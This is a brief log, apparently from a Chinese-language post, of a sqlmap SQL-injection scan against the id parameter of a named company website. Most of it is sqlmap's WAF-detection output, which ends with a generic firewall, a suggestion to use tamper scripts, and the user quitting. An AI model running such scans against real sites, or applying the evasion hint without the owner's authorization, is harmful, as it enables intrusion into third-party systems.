命令

sqlmap.py -u "http://www.samilsys.com/project_detail.php?id=12" -v3 --dbs

测试结果

[09:23:36] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS/IDS

do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N] y

[09:23:52] [WARNING] dropping timeout to 10 seconds (i.e. '--timeout=10')

[09:23:52] [DEBUG] loading WAF script '360'

[09:23:52] [DEBUG] loading WAF script 'airlock'

[09:23:52] [DEBUG] loading WAF script 'anquanbao'

[09:23:52] [DEBUG] loading WAF script 'armor'

[09:23:52] [DEBUG] loading WAF script 'aws'

[09:23:52] [DEBUG] loading WAF script 'baidu'

[09:23:52] [DEBUG] loading WAF script 'barracuda'

[09:23:52] [DEBUG] loading WAF script 'bigip'

[09:23:52] [DEBUG] loading WAF script 'binarysec'

[09:23:52] [DEBUG] loading WAF script 'blockdos'

[09:23:52] [DEBUG] loading WAF script 'ciscoacexml'

[09:23:52] [DEBUG] loading WAF script 'cloudflare'

[09:23:52] [DEBUG] loading WAF script 'cloudfront'

[09:23:52] [DEBUG] loading WAF script 'comodo'

[09:23:52] [DEBUG] loading WAF script 'datapower'

[09:23:52] [DEBUG] loading WAF script 'denyall'

[09:23:52] [DEBUG] loading WAF script 'dotdefender'

[09:23:52] [DEBUG] loading WAF script 'edgecast'

[09:23:52] [DEBUG] loading WAF script 'expressionengine'

[09:23:52] [DEBUG] loading WAF script 'fortiweb'

[09:23:52] [DEBUG] loading WAF script 'generic'

[09:23:52] [DEBUG] loading WAF script 'hyperguard'

[09:23:52] [DEBUG] loading WAF script 'incapsula'

[09:23:52] [DEBUG] loading WAF script 'isaserver'

[09:23:52] [DEBUG] loading WAF script 'jiasule'

[09:23:52] [DEBUG] loading WAF script 'knownsec'

[09:23:52] [DEBUG] loading WAF script 'kona'

[09:23:52] [DEBUG] loading WAF script 'modsecurity'

[09:23:52] [DEBUG] loading WAF script 'netcontinuum'

[09:23:52] [DEBUG] loading WAF script 'netscaler'

[09:23:52] [DEBUG] loading WAF script 'newdefend'

[09:23:52] [DEBUG] loading WAF script 'nsfocus'

[09:23:52] [DEBUG] loading WAF script 'paloalto'

[09:23:52] [DEBUG] loading WAF script 'profense'

[09:23:52] [DEBUG] loading WAF script 'proventia'

[09:23:52] [DEBUG] loading WAF script 'radware'

[09:23:52] [DEBUG] loading WAF script 'requestvalidationmode'

[09:23:52] [DEBUG] loading WAF script 'safe3'

[09:23:52] [DEBUG] loading WAF script 'safedog'

[09:23:52] [DEBUG] loading WAF script 'secureiis'

[09:23:52] [DEBUG] loading WAF script 'senginx'

[09:23:52] [DEBUG] loading WAF script 'sitelock'

[09:23:52] [DEBUG] loading WAF script 'sonicwall'

[09:23:52] [DEBUG] loading WAF script 'sophos'

[09:23:52] [DEBUG] loading WAF script 'stingray'

[09:23:52] [DEBUG] loading WAF script 'sucuri'

[09:23:52] [DEBUG] loading WAF script 'tencent'

[09:23:52] [DEBUG] loading WAF script 'teros'

[09:23:52] [DEBUG] loading WAF script 'trafficshield'

[09:23:52] [DEBUG] loading WAF script 'urlscan'

[09:23:52] [DEBUG] loading WAF script 'uspses'

[09:23:52] [DEBUG] loading WAF script 'varnish'

[09:23:52] [DEBUG] loading WAF script 'wallarm'

[09:23:52] [DEBUG] loading WAF script 'webappsecure'

[09:23:52] [DEBUG] loading WAF script 'webknight'

[09:23:52] [DEBUG] loading WAF script 'yundun'

[09:23:52] [DEBUG] loading WAF script 'yunsuo'

[09:23:52] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product '360 Web Application Firewall (360)'

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'Airlock (Phion/Ergon)'

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'Anquanbao Web Application Firewall (Anquanbao)'

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'Armor Protection (Armor Defense)'

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'Amazon Web Services Web Application Firewall (Amazon)'

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'Yunjiasu Web Application Firewall (Baidu)'

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'Barracuda Web Application Firewall (Barracuda Networks)'

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'BIG-IP Application Security Manager (F5 Networks)'

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'BinarySEC Web Application Firewall (BinarySEC)'

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'BlockDoS'

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'Cisco ACE XML Gateway (Cisco Systems)'

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'CloudFlare Web Application Firewall (CloudFlare)'

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'CloudFront (Amazon)'

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'Comodo Web Application Firewall (Comodo)'

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'IBM WebSphere DataPower (IBM)'

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'Deny All Web Application Firewall (DenyAll)'

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'dotDefender (Applicure Technologies)'

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'EdgeCast WAF (Verizon)'

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'ExpressionEngine (EllisLab)'

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'FortiWeb Web Application Firewall (Fortinet)'

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'Hyperguard Web Application Firewall (art of defence)'

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'Incapsula Web Application Firewall (Incapsula/Imperva)'

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'ISA Server (Microsoft)'

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'Jiasule Web Application Firewall (Jiasule)'

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'KS-WAF (Knownsec)'

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'KONA Security Solutions (Akamai Technologies)'

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'ModSecurity: Open Source Web Application Firewall (Trustwave)'

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'NetContinuum Web Application Firewall (NetContinuum/Barracuda Networks)'

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'NetScaler (Citrix Systems)'

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'Newdefend Web Application Firewall (Newdefend)'

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'NSFOCUS Web Application Firewall (NSFOCUS)'

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'Palo Alto Firewall (Palo Alto Networks)'

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'Profense Web Application Firewall (Armorlogic)'

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'Proventia Web Application Security (IBM)'

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'AppWall (Radware)'

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'ASP.NET RequestValidationMode (Microsoft)'

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'Safe3 Web Application Firewall'

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'Safedog Web Application Firewall (Safedog)'

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'SecureIIS Web Server Security (BeyondTrust)'

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'SEnginx (Neusoft Corporation)'

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'TrueShield Web Application Firewall (SiteLock)'

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'SonicWALL (Dell)'

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'UTM Web Protection (Sophos)'

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'Stingray Application Firewall (Riverbed / Brocade)'

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'CloudProxy WebSite Firewall (Sucuri)'

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'Tencent Cloud Web Application Firewall (Tencent Cloud Computing)'

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'Teros/Citrix Application Firewall Enterprise (Teros/Citrix Systems)'

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'TrafficShield (F5 Networks)'

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'UrlScan (Microsoft)'

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'USP Secure Entry Server (United Security Providers)'

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'Varnish FireWall (OWASP) '

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'Wallarm Web Application Firewall (Wallarm)'

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'webApp.secure (webScurity)'

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'WebKnight Application Firewall (AQTRONIX)'

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'Yundun Web Application Firewall (Yundun)'

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'Yunsuo Web Application Firewall (Yunsuo)'

[09:23:52] [DEBUG] checking for WAF/IPS/IDS product 'Generic (Unknown)'

[09:23:52] [CRITICAL] WAF/IPS/IDS identified as 'Generic (Unknown)'

are you sure that you want to continue with further target testing? [y/N] y

[09:23:56] [WARNING] please consider usage of tamper scripts (option '--tamper')

[09:23:56] [ERROR] user quit